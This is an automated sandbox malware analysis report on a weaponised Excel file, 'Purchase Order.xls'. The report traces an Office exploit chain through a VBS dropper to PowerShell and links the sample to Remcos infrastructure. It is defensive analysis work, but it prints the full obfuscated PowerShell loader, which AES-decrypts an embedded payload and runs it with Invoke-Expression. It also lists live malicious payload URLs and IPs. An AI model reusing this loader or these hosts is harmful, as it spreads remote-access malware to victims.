    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9212Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3236Thread sleep time: -240000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3424Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3432Thread sleep time: -14757395258967632s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3432Thread sleep time: -3000000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3332, type: MEMORYSTR
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni87355924191917571657221755980918cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cniowxrowtig5switg7zfd9oyi4qwnw2dsa+q1jveygii0r57qf0caj6ce9ujcue17thtaaiql4mofqp8uqjn3viikukad9gjb73ylemkpbpyycaeu88vsgvza+wmnqqkojtucgsrahp+xfvolxiwkzrec6cdmhgqtbr7ul9x0coyu8fzvclezpcj9sc07ffdrohhuhbsqkccmgvkwzbfde4wi4qsxfr0cioaxw4x1d9oiazdvrlq7tvm7fwsdwkap1gku8ftkup76e06s7qo9memw3tq8quv7o4vz2irxs0ziv2zz43kztqlvpwu56krcwfhzt5wsmdlm6y/kjkaexzm4pluf7yebu0a9z1fi7c07qhaf50prc4b0p4vexv0bzhildo0tp8cckt4gwieeq3gfv2zur7rf0fu7hcrfcz3hfoxlelocy+jfmy8qqsqjd/xosq7loo1qttphgyqfwgzs1pb46tc9lri4voxvswx/gyt8ubh3smlcmjhqtdxw1skyoifbmmuyt6bekgthwo9bt9lstdzfjjap8pyu0ay5hre2jyplqwpugsonpjx2jpl/sc0h2tsg6gjn/cwa7+ltvkfzoynfx30kb9kkg120+unfkms3v8wisgryud+sxqwjcaoypvzwfy584bmta/hr64hnprrwpzoyj9tujt8uvo3tt9ewx1m9yksk8ytrjef02eowbw4wnumrgktnjffyymlsg2nnu1oxxqkoitig2lwgdnoejetoyem7c6a+wupv6mak+vas/xj/i0r6oik7upq6akeyei5dzzuzjjqccizdkfko6mbk4nidu0tenks2a67lz5fuj4pbw/s3wri//butcidgnv8v1qva1jgf41+wksq3kq4+9xtf4drv8toy/yzmuobgdp2ur+y3a2fqqh6nsjon1lo8srnwtjakyukfztnqcwdrqbh3gxlyxp4rqrjf639ikh0a6doidvbjfbrhrk3hkiv1d5dfx68wt1a2vfcyrrj6xvcgm6v6abmhoklbz+irrubegx7pm2fetr5camo9rgs2qwm0echifgb0yk+d7u3tksnz7mguquwdjgkv9b7rpt9c1lk0n1syoy8kxih4yniwpwrtz+l3+pjcwwt0polu/zov3dlsfamsjg+fubduuw6cb+/nfd6ny0tsrkis8ix3ddtansmncnbv4w+qkuagnu/k/ooziqqfamfxwerdymw9x5gz5l/oms8qnelxh1mjfegt8bddzfgl40osweew0um1i4dzqqezfqvqujd7vet4pm7lasim+cnryw2wavlcpcorugd9ti6vwdes0wp/cxdn70muygszqxqn+lyilh1wvofatte8/dmgxr5edat/cxjndrufdr9nawvkhhoi/iyjbgfepqik9qjzhhmsr22avo600gw==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crep
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni87355924191917571657221755980918cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cniowxrowtig5switg7zfd9oyi4qwnw2dsa+q1jveygii0r57qf0caj6ce9ujcue17thtaaiql4mofqp8uqjn3viikukad9gjb73ylemkpbpyycaeu88vsgvza+wmnqqkojtucgsrahp+xfvolxiwkzrec6cdmhgqtbr7ul9x0coyu8fzvclezpcj9sc07ffdrohhuhbsqkccmgvkwzbfde4wi4qsxfr0cioaxw4x1d9oiazdvrlq7tvm7fwsdwkap1gku8ftkup76e06s7qo9memw3tq8quv7o4vz2irxs0ziv2zz43kztqlvpwu56krcwfhzt5wsmdlm6y/kjkaexzm4pluf7yebu0a9z1fi7c07qhaf50prc4b0p4vexv0bzhildo0tp8cckt4gwieeq3gfv2zur7rf0fu7hcrfcz3hfoxlelocy+jfmy8qqsqjd/xosq7loo1qttphgyqfwgzs1pb46tc9lri4voxvswx/gyt8ubh3smlcmjhqtdxw1skyoifbmmuyt6bekgthwo9bt9lstdzfjjap8pyu0ay5hre2jyplqwpugsonpjx2jpl/sc0h2tsg6gjn/cwa7+ltvkfzoynfx30kb9kkg120+unfkms3v8wisgryud+sxqwjcaoypvzwfy584bmta/hr64hnprrwpzoyj9tujt8uvo3tt9ewx1m9yksk8ytrjef02eowbw4wnumrgktnjffyymlsg2nnu1oxxqkoitig2lwgdnoejetoyem7c6a+wupv6mak+vas/xj/i0r6oik7upq6akeyei5dzzuzjjqccizdkfko6mbk4nidu0tenks2a67lz5fuj4pbw/s3wri//butcidgnv8v1qva1jgf41+wksq3kq4+9xtf4drv8toy/yzmuobgdp2ur+y3a2fqqh6nsjon1lo8srnwtjakyukfztnqcwdrqbh3gxlyxp4rqrjf639ikh0a6doidvbjfbrhrk3hkiv1d5dfx68wt1a2vfcyrrj6xvcgm6v6abmhoklbz+irrubegx7pm2fetr5camo9rgs2qwm0echifgb0yk+d7u3tksnz7mguquwdjgkv9b7rpt9c1lk0n1syoy8kxih4yniwpwrtz+l3+pjcwwt0polu/zov3dlsfamsjg+fubduuw6cb+/nfd6ny0tsrkis8ix3ddtansmncnbv4w+qkuagnu/k/ooziqqfamfxwerdymw9x5gz5l/oms8qnelxh1mjfegt8bddzfgl40osweew0um1i4dzqqezfqvqujd7vet4pm7lasim+cnryw2wavlcpcorugd9ti6vwdes0wp/cxdn70muygszqxqn+lyilh1wvofatte8/dmgxr5edat/cxjndrufdr9nawvkhhoi/iyjbgfepqik9qjzhhmsr22avo600gw==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crepJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information131
    Scripting
    Valid Accounts211
    Command and Scripting Interpreter
    1
    Browser Extensions
    11
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Process Discovery
    Remote Services1
    Archive Collected Data
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts43
    Exploitation for Client Execution
    131
    Scripting
    1
    DLL Side-Loading
    21
    Virtualization/Sandbox Evasion
    LSASS Memory21
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media4
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts2
    PowerShell
    1
    DLL Side-Loading
    Logon Script (Windows)11
    Process Injection
    Security Account Manager1
    Application Window Discovery
    SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information
    NTDS1
    Remote System Discovery
    Distributed Component Object ModelInput Capture13
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
    Obfuscated Files or Information
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain Credentials13
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1484765 Sample: Purchase Order.xls Startdate: 30/07/2024 Architecture: WINDOWS Score: 100 40 tny.wtf 2->40 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for URL or domain 2->52 54 Antivirus detection for dropped file 2->54 56 16 other signatures 2->56 8 EXCEL.EXE 57 47 2->8         started        signatures3 process4 dnsIp5 44 tny.wtf 188.114.97.3, 49161, 49163, 49164 CLOUDFLARENETUS European Union 8->44 46 172.245.123.11, 49162, 49166, 80 AS-COLOCROSSINGUS United States 8->46 28 C:\Users\user\...\Purchase Order.xls (copy), Composite 8->28 dropped 30 seethesimplethings...happeyseeyou[1].doc, Rich 8->30 dropped 12 WINWORD.EXE 336 37 8->12         started        17 wscript.exe 1 8->17         started        file6 process7 dnsIp8 48 tny.wtf 12->48 32 C:\Users\user\AppData\Roaming\...\tny.wtf.url, MS 12->32 dropped 34 C:\Users\user\AppData\Roaming\...vwK.url, MS 12->34 dropped 36 ~WRF{8FE04F55-A836...E-A3A590DB0015}.tmp, Composite 12->36 dropped 38 C:\Users\user\AppData\Local\...\FC991353.doc, Rich 12->38 dropped 62 Microsoft Office launches external ms-search protocol handler (WebDAV) 12->62 64 Office viewer loads remote template 12->64 66 Microsoft Office drops suspicious files 12->66 19 EQNEDT32.EXE 12 12->19         started        68 Suspicious powershell command line found 17->68 70 Wscript starts Powershell (via cmd or directly) 17->70 72 Obfuscated command line found 17->72 74 3 other signatures 17->74 23 powershell.exe 12 5 17->23         started        file9 signatures10 process11 dnsIp12 26 C:\...\seethemoononlinetoseebeautygir.vBS, Unicode 19->26 dropped 58 Office equation editor establishes network connection 19->58 60 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 19->60 42 198.46.176.133, 49167, 49168, 80 AS-COLOCROSSINGUS United States 23->42 file13 signatures14

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Purchase Order.xls29%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
    Purchase Order.xls100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesimplethingstobeunderstandeverythingverygreattoseetheatallfinetogetmebackwithentirethings________youreallyhappeyseeyou[1].doc100%AviraHEUR/Rtf.Malformed
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC991353.doc100%AviraHEUR/Rtf.Malformed
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8FE04F55-A836-48BD-93EE-A3A590DB0015}.tmp100%AviraEXP/CVE-2017-11882.Gen
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://nuget.org/nuget.exe0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
    http://198.46.176.133/Upload/vbs.jpeg100%Avira URL Cloudmalware
    http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIFj0%Avira URL Cloudsafe
    http://tny.wtf/0%Avira URL Cloudsafe
    http://tny.wtf/EvwK0%Avira URL Cloudsafe
    http://tny.wtf/EvwKyX0%Avira URL Cloudsafe
    http://172.245.123.11/46/NO/seethesimplethingstobeunderstandeverythingverygreattoseetheatallfinetogetmebackwithentirethings________youreallyhappeyseeyou.doc0%Avira URL Cloudsafe
    http://tny.wtf/EvwKS0%Avira URL Cloudsafe
    http://go.micros0%Avira URL Cloudsafe
    http://198.46.176.1330%Avira URL Cloudsafe
    http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIF0%Avira URL Cloudsafe
    http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIFt0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    tny.wtf
    188.114.97.3
    truetrue
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://198.46.176.133/Upload/vbs.jpegfalse
      • Avira URL Cloud: malware
      unknown
      http://tny.wtf/EvwKfalse
      • Avira URL Cloud: safe
      unknown
      http://172.245.123.11/46/NO/seethesimplethingstobeunderstandeverythingverygreattoseetheatallfinetogetmebackwithentirethings________youreallyhappeyseeyou.doctrue
      • Avira URL Cloud: safe
      unknown
      http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIFtrue
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://tny.wtf/tny.wtf.url.4.drfalse
      • Avira URL Cloud: safe
      unknown
      http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.539010915.0000000003139000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIFjEQNEDT32.EXE, 00000008.00000002.440000620.000000000058F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://contoso.com/powershell.exe, 0000000A.00000002.539010915.0000000003139000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.539010915.0000000003139000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://contoso.com/Licensepowershell.exe, 0000000A.00000002.539010915.0000000003139000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://contoso.com/Iconpowershell.exe, 0000000A.00000002.539010915.0000000003139000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://tny.wtf/EvwKSPurchase Order.xlsfalse
      • Avira URL Cloud: safe
      unknown
      http://tny.wtf/EvwKyX~DF2F0C708EE11275F5.TMP.0.dr, 4E630000.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.538405336.0000000002111000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://go.microspowershell.exe, 0000000A.00000002.538405336.0000000002408000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://198.46.176.133powershell.exe, 0000000A.00000002.538405336.000000000224A000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIFtEQNEDT32.EXE, 00000008.00000002.440000620.000000000058F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      188.114.97.3
      tny.wtfEuropean Union
      13335CLOUDFLARENETUStrue
      198.46.176.133
      unknownUnited States
      36352AS-COLOCROSSINGUSfalse
      172.245.123.11
      unknownUnited States
      36352AS-COLOCROSSINGUStrue
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1484765
      Start date and time:2024-07-30 18:26:31 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 5m 36s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:13
      Number of new started drivers analysed:1
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • GSI enabled (VBA)
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:Purchase Order.xls
      Detection:MAL
      Classification:mal100.expl.evad.winXLS@7/34@6/3
      EGA Information:Failed
      HCA Information:Failed
      Cookbook Comments:
      • Found application associated with file extension: .xls
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Active ActiveX Object
      • Active ActiveX Object
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
      • Execution Graph export aborted for target EQNEDT32.EXE, PID 3216 because there are no executed function
      • Execution Graph export aborted for target powershell.exe, PID 3332 because it is empty
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      • VT rate limit hit for: Purchase Order.xls
      TimeTypeDescription
      12:28:03API Interceptor42x Sleep call for process: EQNEDT32.EXE modified
      12:28:04API Interceptor25x Sleep call for process: wscript.exe modified
      12:28:05API Interceptor181x Sleep call for process: powershell.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      188.114.97.3waybill_shipping_documents_original_BL_CI&PL_29_07_2024_000000002024_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
      • hq.ax/j1L
      0001.lnkGet hashmaliciousUnknownBrowse
      • aroma-elegant.ru/?d
      rScanned_009328.exeGet hashmaliciousFormBookBrowse
      • www.hpo0snermcvqv.xyz/lcts/
      TT51109240018351.exeGet hashmaliciousFormBookBrowse
      • www.ffi07s.xyz/y7ar/
      Dovada platii bancare.exeGet hashmaliciousCoinhive, FormBook, XmrigBrowse
      • www.coinwab.com/kqqj/
      COMANDA BELOR NR13 DIN 240715.xlsGet hashmaliciousRemcosBrowse
      • wx.ax/
      waybill_shipping_documents_original_BL_CI&PL_29_07_2024_00000000_doc.xlsGet hashmaliciousRemcosBrowse
      • tny.wtf/
      QUOTATION_JULQTRA071244.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
      • filetransfer.io/data-package/tzXi3Aju/download
      xB7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
      • filetransfer.io/data-package/lhsg8frc/download
      Scan document.xlsGet hashmaliciousUnknownBrowse
      • hq.ax/
      198.46.176.133wEKsfBWbSz.rtfGet hashmaliciousRemcosBrowse
      • 198.46.176.133/Upload/vbs.jpeg
      4vzwJTZbwT.rtfGet hashmaliciousRemcosBrowse
      • 198.46.176.133/Upload/vbs.jpeg
      NySTAwCpzK.rtfGet hashmaliciousRemcosBrowse
      • 198.46.176.133/Upload/vbs.jpeg
      PI-002312.xlsGet hashmaliciousRemcosBrowse
      • 198.46.176.133/Upload/vbs.jpeg
      SATIN ALMA EMR#U0130.xlsGet hashmaliciousRemcosBrowse
      • 198.46.176.133/Upload/vbs.jpeg
      Purchase order.xlsGet hashmaliciousRemcosBrowse
      • 198.46.176.133/Upload/vbs.jpeg
      createdthingstobefrankwithmeeverywhere.gIF.vbsGet hashmaliciousGuLoader, RemcosBrowse
      • 198.46.176.133/Upload/vbs.jpeg
      createactiveimagesbeautygirlfrnd.gIF.vbsGet hashmaliciousRemcosBrowse
      • 198.46.176.133/Upload/vbs.jpeg
      screensimplethingstohandlecream.gIF.vbsGet hashmaliciousRemcosBrowse
      • 198.46.176.133/Upload/vbs.jpeg
      creatednewwaterbottleforme.gIF.vbsGet hashmaliciousUnknownBrowse
      • 198.46.176.133/Upload/vbs.jpeg
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      tny.wtfwaybill_shipping_documents_original_BL_CI&PL_29_07_2024_00000000_doc.xlsGet hashmaliciousRemcosBrowse
      • 188.114.96.3
      PI-002312.xlsGet hashmaliciousRemcosBrowse
      • 188.114.97.3
      Purchase order.xlsGet hashmaliciousRemcosBrowse
      • 188.114.97.3
      RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
      • 188.114.97.3
